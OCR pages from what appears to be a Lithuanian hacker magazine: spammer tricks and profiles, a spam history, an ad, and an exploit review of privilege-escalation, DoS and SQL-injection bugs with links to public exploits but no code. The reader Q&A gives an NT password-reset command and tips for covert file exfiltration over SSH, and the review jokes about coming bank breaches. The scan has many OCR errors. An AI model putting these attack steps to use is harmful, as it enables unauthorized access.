atsakyti į laiška. Pavyzdžiui, tu gali gauti tokį perliuk 


„Jūs gavo- 
te šį pranešimą, kadangi esate užsiregistravę įmūsų kasdienio 
krikščioniško naujienlaiškio gavėjų sąraše. Jeigu nepageidauja- 
te iš mūsų gauti naujų pranešimų, galite jų atsisakyti nuspaudę 
ant šios nuorodos“. Vos tik tu paspaudi tokią nuorodą, tavo 
adresas spamerio bazėje automatiškai pažymimas kaip „patik- 
rintas“. Manau, jog tau, kaip ir man, yra tekę gauti laiškus su 
simu: „Kodėl jūs man siuntėte šią fotografiją?“ Nesusi- 


gaudantis žmogus iš karto atsakys: „Kokią nuotrauką?“ ir tuo 
pačiu demaskuos savo pašto dėžutę. Mėgstamiausias spame- 
rių triukas siekiant patikrinti adresus — panaudoti Web Bug. 
Taip vadinama paslėpta HTML laiške esanti nuoroda, kuri iš 
serverio automatiškai užkrauna mažytį 1x1 dydžio paveikslėlį, 
kuris perduodamas pagal banerių veikimo principą. Pats fak- 
tes, jog paveikslėlis buvo persiųstas į vartotojo kompiuterį, by- 
oja apie tai, jog jis gavo laišką. 


[Įžymiausi spameriai] Sparnerių vardai paprastai nėra žinomi, 
kadangi jie kruopščiai slepia bet kokią informaciją apie save ir 
nesirodo internete. Vis dėlto keletas stambių žaidėjų buvo iš- 
aiškinta. Papasakosiu tau apie tris ryškiausius iš jų. 


ĮSenfordas Volesas] Pasiskelbęs spamo karaliumi ir labiau- 
siai nekenčiamas 90-ujų pabaigos Amerikos spameris. 

1995 metais kartu su savo partneriu Voltu Rainsu įkūrė kom- 
paniją „Cyber Promotions“, kuri specializavosi reklamos siunti- 
nėjimu elektroniniu paštu. Pravedęs agresyvią rinkodaros kam- 
paniją internete, šioje srityje greitai užėmė lyderio pozicijas, tuo 
pačiu tapdamas pagrindiniu adresų tiekėju likusiems spame- 
riams. „CyberPromo“ iš spamo ne šiaip sau uždirbdavo pinigus, 
ji taip pat kūrė naujus filtrų apėjimo metodus ir technologijas, 
Kurios leido padidinti siuntinėjimo efektyvumą. Suklastoti atga- 
liniai adresai, retransliacija, dauginė adresacija šios ir kitos 
technikos buvo išrastos Voleso kompanijoje ir vėliau buvo nau- 
dojamos lyderiaujančių spamerių kontorose. 1996 metais Sen- 
fordas taip įsidrąsino, jog padavė į teismą didžiausią Amerikos 
tiekėją „America Online“, kadangi ši blokavo iš „CyberPromo“ 
ateinančius laiškus. Teismas atmetė ieškinį, o kitais metais tiek 
AOL, tiek ir daugelis kitų JAV ISP padavė ieškinį Voleso kompa- 
nijai. Atsakydamas į tai, Senfordas pažadėjo sukurti savo inter- 
neto paslaugos tiekimo įmonę ir taip per ją koordinuoti visą 
siuntinėjimą. To padaryti jis nespėjo. 98-ųjų metų balandį „spa 
mo karalius“ pranešė pasitraukiąas iš spamo verslo, nes siekia 
įkurti legalią „Opt-int“ kompaniją (opt-in šiuo atveju reiškia, 
kad reklama siuntinėjama su vartotojo sutikimu). Niekas neti- 
kėjo šiais tyrais ketinimais ir nenorėjo susidėti su jo nauja kon- 
tora, todėl kompanija greitai užsidarė. Tolimesnė Senfordo Vo- 
Ieso veikla buvo susijusi su internetinės pornografijos reklama, 


o vėliau su jo nauja kompanija „SmartBOT“, kuri platino troja- 
nus ir už 30 dolerių siūlė greitą jų pašalinimo sprendimą. 2005 
metų sausį „SmartBOT“ kompanijai buvo pateiktas ieškinys, ir 
Volesui savo trojanų versliuką teko užbaigti. Niekas nesiryžta 
spėti, kokie bus tolimesni karaliaus projektai. 


[Alanas Ralskis] Dar vienas spamo karalius, kurį interneto ana- 
litikai laiko vaisingiausiu spameriu visoje istorijoje. 80-aisiais 
jis užsiiminėjo ne visai teisėtu draudimu, iš ko uždirbdavo po 
500 tūkstančių dolerių per metus. 90-ųjų pradžioje jis įkliuvo 
dėl banko dokumentų falsifikavimo, zavo tris metus lygtinai ir 
neteko licencijos. Likęs plikas basas, Ralskis pardavė savo se- 
ną automobilį ir nusipirko 2 kompiuterius, norėdamas išmėgin- 
ti jėgas kompiuteriniame versle. Įdomiausia ir pelningiausia veikla 
pasirodė esąs reklaminių pranešimų siuntinėjimas, kuo jis, tie- 
są sakant, ir užsiėmė. 90-ujų pabaigoje jis tapo vienu įtakin- 
giausių spamerių pasaulyje. 

2002 metais Alanas davė interviu laikraščiui „The Detroit News“, 
kuris buvo išpublikuotas populiariame kompiuteriniame portale 
Slashdot. Spamerio samprotavimai sukėlė skaitytojų pasipikti- 
nimo bangą ir liaudis nusprendė „verslininkui“ sušerti jo paties 
prekę. Vienas nuolatinis portalo lankytojas iškasė realų Ralskio 
pašto adresą ir išpublikavo jį Slashdot'e. Po to tūkstančiai kom 
piuteristų pradėjo internete ieškoti firmų, kurios siuntinėjo po- 
pierines reklamas, nemokamus katalogus ir panašią makulatū- 
rą. Skiltyje „kam“ jie įvesdavo Alano adresą, ir visas šis gėris 
nepertraukiamu srautu plūdo pas spamerių karalių. „Šie žmo- 
nės išprotėjo! Jie mane užregistravo visuose nemokamuose siun- 
tinėjimuose visame sušiktame pasaulyje“, — pasiskundė Ala- 
nas žurnalistams, tačiau pats ir toliau platino milijardus žinučių 
visame internete. 

2005 metų rugsėjį FTB aplankė 60-mečio Alano Ralskio na- 
mus ir konfiskavo visą kompiuterinę techniką, įskaitant ir keletą 
galingų serverių, finansinius dokumentus bei visus kitus daik- 
tus, kurie bylojo apie jo spamerišką veiklą. Visi veiksmai buvo 
koordinuojami būtent čia, kadangi Ralskis kontroliavo apie 200 
pašto serverių, kiekvienas kurių per valandą galėjo išsiųsti 650 
tūkstančių reklaminių laiškų. Spamo karalius nesigailėjo savo 
veiksmų: „Aš ne spameris, aš verslininkas elektroninės rekla- 
mos srityje“. Nepaisant to, pagyvenusiam verslininkui pagal JAV 


„spamo karalius" Alanas Ralskis 
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spamerių adresų duomenų bazė 


įstatymus, kur uždraustas nepageidaujamų reklaminių praneši- 
mų siuntinėjimas, gresia iki 20 metų kalėjimo ir 11 tūkstančių 
dolerių bauda už kiekvieną vartotoją, kuriam jis spėjo pakenkti. 


[Vardanas Kušniras] Armėnas, rusiškame internete žymaus 
„Amerikiečių anglų kalbos mokymo centro“ spamo autorius. Nuo 
2003 iki 2004 metų pasiūlymą mokytis kalbos gavo daugiau 
nei 25 milijonai žmonių Rusijoje, Ukrainoje, Izraelyje ir net JAV. 
Beje, laiškai buvo siunčiami reguliariai ir pakeistu pavidalu. Ame- 
rikiečių anglų kalbos mokymo centras taip išvedė iš kantrybės 
mūsų Rytų kaimynus, jog į kova prieš spamerį sukilo tūkstančiai 
žmonių. Vieni kovojo skambindami laiškuose paliktu telefonu ir 
domėdamiesi vienomis ir tomis pačiomis smulkmenomis (nuo 
Šių įniršusių skambučių pagrindinis pelnas atitekdavo Kušnirui, 
kadangi paliktas telefono numeris buvo mokamas. Spameris 
per mėnesį vidutiniškai gaudavo apie 10 tūkstančių dolerių), 
kiti prieš kontoros saitus organizuodavo DDOS atakas. Prieš Cen- 
trą stojo net valdžia — Rusijos Federacijos ryšių ministras An- 
drejus Korotkovas raštiškai pareikalavo nutraukti siuntinėjimą. 
Dėl pagrindinio Rusijos 
spamerio veiksmų kai ku- 
rie užsienio pašto serve- 
riai blokavo bet kokius iš 
„ru domeno gaunamus 
laiškus, dėl ko negalėjo 
susirašinėti skirtingose 
šalyse gyvenantys žmo- 
nės. 

Mirusio Vardano Kušni- 
ro kūnas buvo rastas 
2005 metų liepos 24 
dieną, Maskvos centre 
esančiame trijų kamba- 
rių bute. Ekspertizė pa- 
rodė, jog spameris mirė 
dėl keleto stiprių smūgių 
į galvą. Oficiali milicijos 
versija tokia: Kušniras 
žuvo per bandymą api- 


Bilas Geitsas 


aršus kovotojas SU spamu 


plėšti. Tikra priežastis liko nežino- 
ma. 


[1937] Žodis SPAM atsirado gū 
džiais 1937 metais, po geriau- 
sio naujų „Hornel Foods“ kompa 
nijos gaminamų kiaulienos kon- 
servų pavadinimo konkurso. 
Skambią frazę Shoulder of Pork 
and hAM („kiaulienos kumpeliai*) 
pasiūlė aktorius Kenetas Deinju, 
kompanijos viceprezidento brolis, 
kuris ir laimėjo 100 dolerių pri- 
Zą. Konservai buvo skanūs, mais- 
tingi ir, kas tam laikui buvo taip 
pat svarbu, pigūs. Nenuostabu, 
jog labai greitai jie tapo vos ne nacionaliniu Amerikos patieka: 
lu. Iš spamo buvo galima paruošti šimtus skirtingų patiekalų, 
0 „Hornel Foods“ kartu su gausia reklama nuolat siūlė naujus 
receptus. Kitų šalių gyventojai šaipėsi iš naujos amerikiečių 
maisto meilės. „Monty Python“ oro cirkas net išleido seriją 
spektaklių pavadinimu spam, spam, spam. Juose buvo rodo- 
ma amerikiečių porelė, kuri užeidavo į restoraną pavalgyti, ta- 
čiau kad ir ką jie užsisakytų, visi patiekalai būdavo skirtingai 
paruošti SPAM konservai. 


Kasperskio laboratorijos 
antispamo sprendimas 


[1970] 70-aisiais baigėsi „Hornel“ produkcijos žvaigždžių va 
landa ir prasidėjo kompiuterių tinklų era. Daugelis mano, jog 
kompiuterinio spamo protėviais tapo ARPA agentūra, ARPANe- 
te siuntinėjusi įvairią techninę informaciją, kuri domino toli gražu 
ne visus. Tačiau tuomet tai buvo tiesiog laiškai, kurie būdavo 
vertinami visiškai normaliai ir nebuvo vadinami konservų vardu. 


[1986] 1986 metais Usenet konferencijose pasirodė daugybė 
vienodų Deivo Rodeso pranešimų, kuriuose jis reklamavo naują 
finansinę piramidę. Antraštė skelbė: „Greitai užsidirbk krūvą pi- 
nigų“, o laiškuose buvo pateikta instrukcija, kaip tai padaryti. 
Deivas su pavydėtinu užsispyrimu ir toliau siuntinėjo savo teks- 
tus, kurie taip įgriso visiems konferencijų prenumeratoriams, 
jog juos pradėjo lyginti su 4O-aisiais visų vartotais SPAM kon- 
servais. 


[1993] Vis dėlto tarp kompiuteristų šis žodis iš tiesų populia- 
rus tapo 1993 metais, kuomet Ričardas Depju parašė auto- 
matinio Usenet konferencijų modeliavimo programą, kuri dėl 
klaidos vietoje vieno pranešimo pašalinimo jį išsiuntė 200 kartų 
į news.admin. policy newsgroup. Daugybė atsiųstų laiškų buvo 
pakrikštyta spamu, o po keleto metų, kuomet toks reiškinys 
tapo dažnas, šis žodis galutinai įsitvirtino kompiuteriniame |ek- 
sikone. 


[2003] 2003 metų spalio 24 dieną Santa Klaros (Kalifornija) 
apylinkės teismas už neteisėtą reklaminių pranešimų siuntinė- 
jimą du jaunuolius įpareigojo išmokėti dviejų milijonų dolerių 
dydžio baudą. 


[2004] 2004 lapkričio 4 dieną už Can Spam Act pažeidimus 
teismas 9 metams laisvės atėmimo nuteisė vieną įtakingiausių 
interneto spamerių Džeremį Džeimsą. 


Intenso. All yOur dat4 nOw b3lOng5 tO u5! 


ai aMOMB 700 MB / Tx-5a 


CD-Recordable + CD-Enregistrable 


Intenso, optinių laikmenų pardavimų lyderis Vokietijoje, siūlo platų muzika | duomenys | nuotraukos | video 
aukštos kokybės CD-R, CD-RW, DVD-R(W), DVD+R(W) ir padidintos 

talpos diskų 800Mb/90 min. pasirinkimą. Visi šie produktai 

platinami „cakebox“ ir „jewel“ dėžutėse. 


Spartiems DVD, mini-DVD (8 cm) ir dvisluoksniams DVD diskams 
Intenso siūlo dar platesnį pakuočių pasirinkimą. 

Unikalus naujas produktas - CD ir DVD su specialiu spalvas 
apsaugančiu užpurškimu. 


Intenso - tai aukštos kokybės produkcija už gerą kainą. 


(Intenso) 


Wwww.intenso.de 


Sprendimai Jūsų skaitmeniniam pasauliui 


EKSPLOITŲ APŽVALGA 


Windows Media Player <=v. 
buffer overflow exploits 


[Aprašymas] Vasario 15 dieną bugtrag 
puslapiuose pasirodė užuominu apie gau: 
sius žinomo grotuvo Windows Media Pla- 
yer pažeidžiamumus. Pirmasis jų buvo bu- 
ferio perpildymas tiesiogiai kreipiantis i 
www esančią grojamą (media! bylą. Ne: 
sunku numanyti, kad šiuo atveju eksplo!- 
tas -— tai padirbtas HTML puslapis su spe- 
Cialiai suformuotu EMBED SRC tagu. O 
jeigu tiksliau, tai eksploitas pateikiamas 
Peri modulio pavidalu, kuris atidaro soke: 
tą ir perpildo WMP buferį. 
Pažeidžiamumas grotuvui nurauna sto- 
gą, kuomet atidaroma speciali BMP by- 
la, kurios antrašteje deklaruojamas O 
baitu dydis. Bitmap paveikslėlyje įrašv- 
tas shell-kodas įvykdomas einamo var- 
totojo teisėmis. Tačiau pateiktas eks- 
ploitas demonstruoja tik DoS ataka prieš 
WMP. 


[Apsauga] Šio pažeidžiamumo galima at- 
sikratyti įdiegus specialų pataisymų pa. 
ketą. Pataisymų sąrašas pateikiamas čia: 
www.securitylab.ru/vulnerability 
262517.php. Kategoriškai nerekomen- 
duoju atidarineti Media byla iš nežinomų 
resursų 


[Nuorodosį Pirmojo pažeidžamumo eks- 
ploitas yra čia: www.securitylab.ru/poc/ex- 
tra/262743.php, antrojo — Čia: WWww.se- 
curitylab.ru/poc/extra/262735.php. Išsa 
mų klaidos aprašymą rasi šiuo adresu: 
www.securitylab.ru/vulnerability 
262517.php 


[Blogio įvertinimas ir potencialas] Jau 
kelinta karta eilinis lokalus MS produkto 
pažeidžiamumas griauna korporacijos re- 
putaciją. Džiugina tik tai, kad pirmoji klai- 
da (kreipimasis į media bvlą) neveikia su 
IE, tačiau puikiai pribaigia WMP kitose nar 
Šyklese 


ĮSveikinimai] Pirmuoju klaidų atradėju ta- 
po Žinor komanda iDefense. Eksploitų 
autoriai iki šio! nežinomi. 


MyS0L 4.x/5.0 User-Defined Function 
Local Privilege Escalation Exploit 


[Aprašymas] Lokalus prieš MySOL ser- 
veri nukreiptas pažeidžiamumas. Hakeris 
gali sukurti specialią biblioteką, po to ją 
įdiegti į MySOL kaip funkciją ir ją iškviesti 
vietoje argumentų pateikdamas koman 
du rinkinį. Finale mysąld visas komandas 
Įwkdys su padidintomis teisėmis (papras- 
tai root vartotojo vardu). Po to hakeris pa- 
leis komandų interpretatorių ir mėgausis 
root teisių teikiamais smagumais. 

Be šios klaidos. egzistuoja dar dvi, tačiau 
kol kas viešumoje nėra joms sukurtų eks. 
ploitų. 

Išleistas eksploitas yra ta pati kenksmin- 
goji biblioteka, su kuria pateikiami išsa- 
mus naudojimo aprašymas (kompiliavi- 
mas, prijungimas ir pats įdiegimas). Vis- 
kas aprašyta pažingsniui, todėl su eksploi- 
tu susitvarkyti sugebės net ir skriptvaikiai 


[Apsauga] Eksploitas testuotas su MySOL 
4.1.14. Pasak kūrėjų. visos kitos versijos 
nera pažeidžiamos. Taigi teisingiausias ap- 
saugos būdas — savalaikis MySOL servi- 
so atnaujinimas. Iš esmės galima nau- 
doti ir pažeidžiama sistemą, tačiau tokiu 
atveju būtina visiems vartotojams uždrausti 
rašymą į MySOL bazę. 


[Nuorodosį Viešas eksploitas pateikia- 
mas čia: www.securitylab.ru/poc/extra, 
263102.php. Pažeidžiamumo aprašyma 
(tiek šito, tiek ir kitų) galima rasti šiame 
puslapyje: www.securitylab.ru/vulnerabili- 
1/205267.php. 


[Blogio įvertinimas ir potencialas] 
Mysąld — vienas iš pačių populiariausių 
procesų, kuriuos galima sutikti linuksiniuose 
serveriuose, todėl šis pažeidžiamumas bus 
pakankamai naudingas lokalius užpuolimus 
organizuojantiems hakeriams, ypač įverti- 
nus tai, kad administratoriai retai mysąld 
leidžia neprivilegijuoto vartotojo vardu. 


[Sveikinimai] Už nuostabaus eksploito su- 
kūrimą dėkojame klaidų ieškotojui Marco 
Ivaldi (raptor6dOxdeadbeef.info). 


FreeBSD 6.0 (nfsd) Remote 
Kernei Panic Denial of Service Exploit 


[Aprašymas] Galų gale hakeriai pri- 
sikasė ir iki labiausiai apsaugotos pa- 
saulyje OS — FreeBSD. Apgailėtinas 
pažeidžiamumas slypi NFS demone — 
tinklo failų sistemas valdančiame ser- 
vise. Šis servisas klausosi 2049 jung- 
ties. Jeigu ji atidaryta, piktavalis gali 
1 jungtį pasiųsti. keletą baitų šiukšlių, 
dėl to servise bus perpildytas bufe- 
ris, dėl ko sustos visa sistema ker- 
nel panic 

Eksploitas parašytas su Perl, jame nėra 
nieko sudėtingo — paprasčiausias soke- 
to atidarymas ir shell-kodo išsiuntimas į 
2049 jungti. Po to sistema iškeliaus į am- 
žinosios medžioklės plotus. 


[Apsauga] Šiuo metu apsaugos nuo ap- 
tariamo pažeidžiamumo nėra, todėl de- 
rėtų arba atsisakyti nfsd, arba su įmon- 
tuota ipfw ugniasiene filtruoti 2049 
jungtį. 


[Nuorodos] Veikiantį eksploitą galima 
parsisiųsti iš Attp://www.securitylab.ru/ 
poc/extra/263336.php. Šiek tiek tech- 
ninės informacijos rasi čia: http:/ 
www.securitylab.ru/vulnerability/source/ 
263236.php. 


[Blogio įvertinimas ir potencialas] 
FreeBSD-Team apie pažeidžiamumą 
buvo informuota prieš 3 savaites, tačiau 
reakcijos į klaidą kol kas nesulaukta. 
Greičiausiai programuotojai turi rimtes- 
niu problemų, nei DoS atakos per nfsad 
leidžiančio išvengti branduolio pataisy- 
mo išleidimas. 


[Sveikinimai] Apie klaidą pranešė klai- 
dų ieškotojas iš Rusijos Jevgenijus Le- 
gerovas (www.gleg.net). Paprastutį eks- 
ploitą parašė koderis strOke iš milwOrm 
(milwOrm.com) komandos. Reiškiame 
padėką šiems talentingiems žmonėms 


Invision Power Board < 2.1.4 Pas- 
sword change SOL-Injection Exploit 


[Aprašymas] Apie IPB projektą nėra ko 
daug šnekėti visi žino šį forumą ir 
pagarsėjusias jo klaidas. Šį mėnesį per 
mūsų hakerių tūsą buvo nuspręsta pa- 
rašyti priešpaskutinei IPB versijai skir- 
tą eksploitą. Klaida čia aptikta dėl ne- 
pakankamo įvedamų duomenų apdo- 
rojimo, dėl kurios piktavalis gali foru- 
me atlikti SOL injekciją. Šis eksploitas 
leidžia bet kuriam vartotojui gauti slap- 
tažodžio pakeitimo (reset) nuorodą. Pa- 
stebėtina tai, kad eksploitas pilnai pa- 
rašytas su PHP ir duomenų perdavimui 
viso labo reikalauja aktyvuoto CURL mo- 
dulio. 

Eksploite galima keisti kai kuriuos para- 
metrus. Tarkim, hakeris perdavimui gali 
naudoti Socks, nurodyti Cookie saugoji- 
mo bylą arba pakeisti UserAgent. Visa tai 
įvykdoma PHP kodo antraštės dalyje. 


[Apsauga] IPB programuotojai greitai 
sureagavo į pažeidžiamumą — buvo iš- 
leisti specialūs apsaugantys pataisymai. 
Juos pasiimti galima iš oficialios pro- 
jekto svetainės: www.spip.net. Alterna- 
tyvus būdas — įdiegti stabilesnę foru- 
mo versiją. 


[Nuorodos] Eksploitas yra čia: www.se- 
curitylab.ru/poc/extra/263727.php. Kele- 
tą žodžių apie atnaujinimą galima rasti čia: 
www.securitylab.ru/vulnerability/source/ 
263633.php. 


[Blogio įvertinimas ir potencialas] Fo- 
rumų klaidos — gardūs kąsneliai skrip- 
tvaikiams. Čia didelio proto nereikia: per- 
siuntei eksploitą ir gavai administratoriaus 
slaptažodį. Su pažeidžiamų serverių pa- 
ieška problemų taip pat neturėtų iškilti 
Google viską padarys už tave :). 


[Sveikinimai] Dėkojame mūsų hakeriams 
Nitrex ir Dukenn. taip pat gerai žino- 
miems žmonėms Dr UFO 51, kOpa, 
NSD ir Naikon. Linkime jiems ir toliau 
darbuotis bugtrag labui! 


EKSPLOITŲ APŽVALGA 


Apple Mac OS X “/usr/bin/passwd" Bina- 
ry Local Privilege Escalation (root) Exploit 


[Aprašymas] Ar kada nors esi gavęs 
shellą MacOS sistemoje? Aš — taip. Ir 
reikėtų pasakyti, jog tai labiausiai nepa- 
žeidžiama sistema, kokią aš tik esu ma- 
tęs. Eksploitą galima rasti net ir senoviš- 
kai SCO, o štai su Apple MacOS viskas 
kur kas sudėtingiau. Taip buvo iki visai ne- 
seniai. Klaidų ieškotojai išleido naują /usr/ 
bin/passwd eksploitą. Jo principas labai 
paprastas: paleidus /usr/bin/passwd /tmp 
kataloge sukuriama laikina byla. Eksploi- 
tas su suklastotu fake passwd, kuris iš 
anksto sulinkintas su /etc/sudoers, suku- 
ria symlink'ą į šią bylą. Po šių machinaci- 
jų /etc/sudoers yra pakeičiamas, dėl ko 
tampa įmanoma laisvai pasirinkto varto- 
tojo vardu paleisti „sudo sh“. 

Eksploitas parašytas su Perl, jame patei- 
kiami išsamūs vartojimo komentarai. 


[Apsauga] Vienintelis apsisaugojimo nuo 
šio pažeidžiamumo būdas — įdiegti ofi- 
cialioje www.apple.com svetainėje patei- 
kiamą atnaujinimą. 


[Nuorodos] Eksploitą galima gauti šia- 
me puslapyje: www.securitylab.ru/poc/ 
extra/263496.php. Šiek tiek techninės 
informacijos galima pasiimti iš čia: 
www.securitylab.ru/vulnerability/ 
263470.php. 


[Blogio įvertinimas ir potencialas] Nors 
MacOS ir nėra labiausiai internete papli- 
tusi sistema, tačiau man yra pavykę gauti 
shellus keliuose tokiuose serveriuose. 
Nuotoliniai užpuolimai paprastai vykdomi 
per Web, o su lokaliais iki šio laiko buvo 
riestoka, kol nepasirodė čia aprašytas eks- 
ploitas :). 


[Sveikinimai] Už nuostabų eksploitą dė- 
kojame mažai žinomam hakeriui slapy- 
vardžiu vade79/v9 (v9(Dfakehalo.us) 
Kalbant apie pačius pažeidžiamumus. 
pataisymų sarašą (taip pat ir /usr/bin/ 
passwd) viešai išpublikavo Apple korpo- 
racija. 


SCO Unixware 7.1.3 (ptrace) 
Local Privilege Escalation Exploit 


[Aprašymas| Pati efektyviausia ir uni- 
versaliausia Linux branduolių klaida 
buvo ptrace pažeidžiamumas. Ilgai 
klaidų ieškotojai vis surasdavo naujų 
ir ištobulintų root gavimo metodų per 
šią branduolinę funkciją. Klaida užsi- 
slėpė ir SCO Unixware 7.1.3 sistemo- 
je, kur buvo aptikta visai neseniai. Pa- 
žeidžiamumo principas tas pats: pa- 
leidžiama funkcija ptrace(), po ko gau 
mamos root teisės. Eksploitas turi bū- 
ti paleidžiamas su suid programos ar- 
gumentu, pavyzdžiui, /unixware/usrilib; 
sendmail, tik tokiu atveju garantuoja 
mas privilegijų sukėlimas. Deja, tech- 
ninės šio pažeidžiamumo detalės nė- 
ra atskleidžiamos 


[Apsauga] Vienintelis apsaugos būdas yra 
išganingojo pataisymo įdiegimas, kuris 
pateikiamas oficialioje svetainėje 
www.cpgnuke.com. Jeigu tu administruoji 
SCO, tai tuojau pat junkis prie savo siste- 
mos ir parsisiųsk visus reikiamus dalykė- 
lius. 


[Nuorodos] Eksploitas pateikiamas ad- 
resu www.securitylab.ru/poc/extra 
263228.php. Parsisiųsk jį ir testuok, ta- 
čiau tik tau patikėtose sistemose. 


[Blogio įvertinimas ir potencialas] Vi 
siems žinoma, kad SCO paprastai įdie- 
giama strategiškai svarbiuose serveriuo- 
se, pavyzdžiui, bankų mašinose. Taigi 
laukiame stambių nulaužimų su po to 
einančiu svarbių transakcijų, kreditinių 
kortelių bazių ir panašių dalykų pagro- 
bimu :). 


[Sveikinimai] Už padovanotą eksploitą 
dėkojame hakerių komandai 
milwOrm.com (ji jau buvo paminėta 
šioje apžvalgoje). SCO Unixware sis- 
temoje tapo viena lemtinga klaida 
daugiau. 


PRIEŠ UŽDUODAMAS KLAUSIMĄ 
PAGALVOK! MAN NEVERTA SIŲSTI 
KLAUSIMŲ, VIENAIP AR KITAIP 
SUSIJUSIŲ SU HAKINIMU/KREKI- 
NIMU/FRYKINIMU — TAM SKIRTAS 
„HACK-FAG“, TAIP PAT NEVERTA 
UŽDAVINĖTI AKIVAIZDŽIAI LAME- 
RISKŲ KLAUSIMŲ, ATSAKYMUS | 
KURIUOS BENT KIEK NORĖDAMAS 
GALI RASTI IR PATS. AŠ NE TELE- 
PATAS, TODĖL KONKRETIZUOK 
KLAUSIMĄ IR ATSIŲSK KUO 
DAUGIAU INFORMACIJOS. 


(O) Kaip galima sekti Remote Desktop prisijungimus? 


Jeigu tave domina su specialia programine įranga at- 

liekami sprendimai, tiks bet koks jungčių monitorius. 

Tereikia stebėti prisijungimus į 3389; šiam nesudė- 

tingam procesui paprasčiausia programa bus paties 

MS sukurtas Port Reporter (support.microsoft.com/kb/ 
837243). Prisijungimus taip pat galima stebėti sistemos 
security loge, kur sėkmingi prisijungimai bus pažymėti įvy- 
kiais su ID 528 ir 540. Tave domins 10 tipo logon'ai, ty. 
Remotelnteractive. Siekiant palengvinti savo dalią, praverstų 
įdarbinti LogParser (neoficiali svetainė — www.logpar- 
ser.com), kuris logus galėtų prafiltruoti tavo nuožiūra. 
Galbūt tai ir nesusiję su tavo klausimu, tačiau kai reikalingi 
darbo su RD logai kadrų pavidalu, tau padėti galėtų toks 
produktas, kaip TurboDemo (www.turbodemo.com). Deja, 
Ilgalaikis ir išsamus daiktinių įrodymų paėmimas dažnai su- 
kelia sistemos veikimo sutrikimus. 


Ar yra Mac sistemai skirtų kirminų? 
Yra, kad tik būtų, kur juos dėti... Turint užkrato koncep- 


ciją, jo perkėlimas į tam tikrą OS tampa laiko klausimu. 

Pastaruoju metu prasisuko užkratas CME-4, kuris plinta 

iChat'u ir yra Leap Viruso koncepcija. Jis nėra kirminas 

tikrąja žodžio prasme, kadangi tolimesniam dauginimui- 

si iš vartotojo reikalauja tam tikrų veiksmų. Visa tai vei- 
kia socialinės inžinerijos principu, o ne kaip pačios OS pa- 
žeidžiamumas. Kirminas platinamas ekrano užsklandos 
(screen saver) pavidalu, originali versija nekelia grėsmės. 
Visa tai buvo išleista kaip sistemos saugumo silpnybės pa. 
wyzdys. Tolimesnis plitimas sėkmingas tik paleidus admi- 
nistratoriaus vardu. Kitas Java kirminas, OSX.Ingtana.A. bu- 
vo pristatytas publikos teismui siekiant parodyti BlueTooth 
Directory pažeidžiamumo, kuris buvo atrastas ir sėkmingai 
užlopytas praėjusių metų birželį, išnaudojimo pavyzdį. Tre- 
čiasis ir labiausiai nusipelnęs pažeidžiamumas buvo pava- 
dintas kirminu, kuris tapo tokio tipo užkrėtimo galimybės 
įrodymu, tačiau masiškai nepaplito. Pavyzdyje eksploatuo- 
jama skylė leidžia be vartotojo žinios iš atidaryto archyvo 
paleidinėti vykdomas bylas. 


Kodėl man jungiantis prie IRC serverio mane nuo- 
lat skenuoja? 


Kodėl budėtojai visada žiūri lankytojams į veidą? Todėl, 
kad reikia žinoti, kas pas mus užsuka ir ar jis su savimi 


neturi ko nors blogo? Tu veikiausiai kalbi apie 23. 80, 

1080 ir 3128 jungtis, kuris paprasčiausiai automatiš- 
kai patikrina IRC tinklo administracija. Tai daroma dėl pa- 
prasčiausios priežasties: 23 naudoja telnet serveris, 80 ir 
3128 — HTTP proxy serveriai, o 1080 — SOCKS'ai. Visus 
juos kartais eksploatuoja ką nors atakuoti susiruošę niek- 
šeliai, kurie taip gali praeiti pro vartotojams uždėtus k-line 
draudimus ar pravedinėti masiškas reklamines kampani- 
jas. Taip pat būtų logiška išstudijuoti naudojamų IRC semve- 
rių MOTD (message of the day), kur visada rašoma apie 
atliekamą skenavimą. 


O 


| 


Ar diskelių įrenginio išėmimas padėtų nuo slapta- 
žodžių nuėmimo programų (pavyzdžiui, NT Offline) 
užkrovimo į biuro sistemą? 


Derėtų atminti, kad paminėta programa (home.eu- 

net.no/pnordahl/ntpasswd/editor.html) į sistemą gali 

būti įdiegta iš skirtingų laikmenų. Tokius dalykus at- 
jungti galima BIOS'e arba išimant tų pačių kaupiklių skaity- 
tuvus: diskelių įrenginį, CD-ROM'ą (kaip biuro sistemoje 
nereikalingą daiktą), USB (kaip potencialią firmos paslap- 
čių grobimo priemonę). USB lizdų išėmimas greičiausiai gali 
būti keblokas, todėl čia padėtų paprasčiausias angų užant- 
spaudavimas. Vis dėlto prieš laužtuvą nepašokinėsi... Inte- 
Iektualesnieji su tokiomis „užkraunamo nulaužimo“ proble- 
momis kovotų visą sisteminį diską užšifruodami su PGP ar 
DriveEncrypt. 


Kas per ataka prieš NT pakeičiant ekrano užsklan- 
dos bylą? 


Šis metodas buvo sėkmingai eksploatuojamas NT 4.0 
kontekste ir nežinia kiek buvo sėkmingai pritaikomas 


su NT 5.0. Atakuojamajame kompiuteryje reikėjo idiegti 
antrą NT sistema, nustatymuose užkrovimo katalogą pa- 
keisti originaliuoju, kad po to būtų surasta ir pašalinta įėji- 
mo į laužiamą sistemą ekrano užsklanda logon.scr. | jos 
vietą buvo įrašoma cmd.exe, kuri pervadinama tuo pačiu 
logon.scr. Daugelyje sistemų prisijungimo/jėjimo į sistemą 
metu (logon screen) Iogon.scr aktyvuojasi po 15 minučių 
neaktyvumo. Sena ir neprotinga sistema paleisdavo cmd.exe 
konsolę, taip įleisdama tave į savo guolį ir suteikdama ne- 
ribotas kontrolės galimybes. GUI mėgėjai užsklandą visiškai 
sėkmingai galėjo sukeisti su explorer.exe. Dirbant su cmd.exe 
paprasčiausiai būdavo surenkama eilutė „net user admi- 
nistrator 123456“, kuri administratoriaus slaptažodį pa- 
keisdavo prozišku 123456. 


(O) Ar yra koks nors patogesnis informacijos parsi- 


siuntimo iš SSHv2 serverio būdas, nei bylų iš ten 
siuntimas paštu (mailx)? 


Tiesą sakant, turint ssh priėjimą ir pakankamas privile- 
gijas, ten galima įdiegti visas pageidaujamas duomenų 


perdavimo priemones — Attp, ftp ir taip toliau. Tačiau 

ne visiškai sankcionuoto priėjimo atveju hakeris gali pa- 
sirinkti ne tokį triukšminga sprendimą, kuomet bylos per- 
duodamos tiesiog per egzistuojantį SSHv2 kanalą. Tokiu at- 
veju sprendimas galėtų būti ftp over ssh2 ir sfip; abu šiuos 
variantus pilnavertiškai įgyvendina SecureFX (www.vandy- 
ke.com). Pastaruoju metu toks funkcionalumas realizuotas 
ir daugelyje kitų ftp klientų, pavyzdžiui, CuteFTP Pro (www.Ccu- 
